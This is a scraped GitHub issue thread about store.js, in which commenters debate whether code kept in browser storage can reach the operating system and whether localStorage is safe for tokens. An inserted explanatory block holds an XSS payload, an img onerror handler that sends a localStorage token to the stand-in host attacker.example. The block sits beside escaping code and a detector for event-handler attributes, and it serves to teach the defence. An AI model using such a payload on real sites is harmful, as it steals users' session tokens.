
Comments (7)

karencho777 commented on June 15, 2024

So no one can answer?

from store.js.

AcidRaZor commented on June 15, 2024

Browsers can't execute EXE files due to security concerns, so storing a file in state won't work. Since JS is client-side, it's quite impossible to execute a file or anything that can interact with the core OS (the container would be the browser, which won't allow the interaction), and those hacks you've more than likely seen don't include malicious code execution from the browser itself, but normally exploit a vulnerability that allows them to use something else to execute their code remotely. This is the reason why Flash was discontinued: the vulnerabilities exploited within Flash components allowed interaction with the core OS, which allowed them to execute code within/through the Flash that was loaded on the site.


karencho777 commented on June 15, 2024

I just read about how they can store encoded code in local storage and then call it out... so if the stored code is in local storage, when it is executed from there, will it interact with the OS? And can they now store files with Flash?


AcidRaZor commented on June 15, 2024

Please share where you found this information.

Local storage cannot interact with the core OS, and store.js doesn't use local storage; it uses state, which is wiped every time you navigate off the website.

Browsers are "containerized", meaning each tab is in its own isolated session, so they can't even interact with other browsers. There's a LOT of security when it comes to the web.

Local storage is also isolated PER DOMAIN. So an attacker who wants to read sensitive information stored in local storage and send it to his own server (username/password or even credit card credentials, or even to try to embed encoded code) needs to first exploit your site through cross-site scripting attacks, testing for vulnerabilities in your setup to inject their own JavaScript code into your website.

Even if they get that right, the only access they have is within the containerized environment of the browser, and they can only read the information; they cannot execute an EXE that is stringified and embedded there either.

So if your site security sucks, then yes, they can store encoded code in local storage, but again, they're isolated from the OS.

Here's an article going over everything in detail: https://dev.to/rdegges/please-stop-using-local-storage-1i04

Also see the following answer if you don't believe me: https://security.stackexchange.com/a/95068

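Added example (not store.js code, and not part of any comment in this thread): the pre-condition the comment above describes. Anything kept in localStorage is readable by every script running on that origin, so the attacker's route to it is getting their own script to run there, typically through an XSS sink such as untrusted input concatenated into HTML. The block renders a constructed attacker payload through a vulnerable template and through an escaped one, then runs a small check that lists event-handler attributes inside real tags. The host `attacker.example` and the storage key `token` are hypothetical.

```javascript
// Added example, not store.js code: the XSS pre-condition from the thread.
// localStorage is readable by any script running on the same origin, so an
// attacker's route to it is injecting script into the site. The classic sink
// is untrusted input concatenated into HTML. Payload and host are constructed.

// Constructed attacker-supplied "display name". If a browser parses it as
// markup, the onerror handler runs on the site's origin and posts the
// localStorage value to a hypothetical attacker host.
const XSS_PAYLOAD =
  "<img src=x onerror=\"fetch('https://attacker.example/?t=' + localStorage.getItem('token'))\">";

// Vulnerable: untrusted input interpolated straight into markup.
function renderGreetingUnsafe(displayName) {
  return `<p>Welcome back, ${displayName}</p>`;
}

// Escape the characters that can end a text node or an attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same template, input escaped before interpolation.
function renderGreetingSafe(displayName) {
  return `<p>Welcome back, ${escapeHtml(displayName)}</p>`;
}

// Minimal check a test can run on rendered output: list every on* event
// handler attribute found inside a real tag. Escaped text such as
// "&lt;img ... onerror=..." is not a tag and is ignored.
function eventHandlerAttributes(html) {
  const found = [];
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrRe = /\b(on[a-z]+)\s*=/gi;
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      found.push(`${tag[1].toLowerCase()}:${attr[1].toLowerCase()}`);
    }
  }
  return found;
}

// Stand-alone run: show both renderings and what the check reports.
for (const [label, render] of [
  ['unsafe', renderGreetingUnsafe],
  ['safe', renderGreetingSafe],
]) {
  const html = render(XSS_PAYLOAD);
  console.log(`${label}: handlers=${JSON.stringify(eventHandlerAttributes(html))}`);
  console.log(`  ${html}`);
}
```

The unsafe rendering yields a real `<img>` tag carrying an `onerror` handler, which is exactly the script execution on the site's origin that the comment says an attacker needs first; the escaped rendering leaves the same bytes as inert text. Escaping is the context-specific fix for HTML text content; attribute values, URLs and inline script contexts each need their own encoding, so a templating engine that escapes by default, plus a Content-Security-Policy that disallows inline handlers, is the practical baseline.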

bjesuiter commented on June 15, 2024

@AcidRaZor Thanks for your explanations. Can we somehow mark this issue as finished to improve the issue count?
I don't have the rights to close the issue, but I've seen that storeJS has not had any updates for 2 years on npm, so it looks like it is not very actively maintained currently.


bjesuiter commented on June 15, 2024

@marcuswestin This issue can be closed.

Maybe the Readme should be extended with a part about security in local storage, so that users understand the implications.

I can recommend to link to this article for that: https://www.rdegges.com/2018/please-stop-using-local-storage/

Maybe I'll add a PR Later to add this to the Readme.


eddiemonge commented on June 15, 2024

I wish people would stop using that article. It's mostly wrong, and it doesn't address how to store things like JWT and other tokens (no, cookies are not a valid answer, as XHR requests don't normally use cookies and JWT needs to be set in the header).
